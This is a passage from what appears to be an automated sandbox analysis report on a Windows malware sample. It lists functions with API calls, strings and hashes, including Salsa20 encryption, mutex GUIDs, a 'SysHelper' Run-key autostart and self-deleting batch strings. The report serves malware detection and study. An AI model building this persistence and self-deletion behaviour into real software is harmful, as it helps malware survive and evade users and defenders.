                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                                                        • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                                                                                        • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                                                                                        • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                                                                                                                        • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                                                                                        • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                                                                                                                        • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                                                                                        • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                                                                                                                        • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                                                                                        • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                                                        • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                                                                                        • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                                                                                                        • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041BCD7
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                                                          • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                                                        • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                                                                                        • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                                                                                                                                                        • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B42
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B55
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B73
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B85
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427B96
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BA1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BC5
                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00718818), ref: 00427BCC
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BE1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427BF7
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00427C1F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                                                                                                                        • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                                                                                                                        • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                                                                                                                        • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                                                        • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                                                                                        • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                                                                                                        • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                                                                                                          • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                                                                                                                        • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
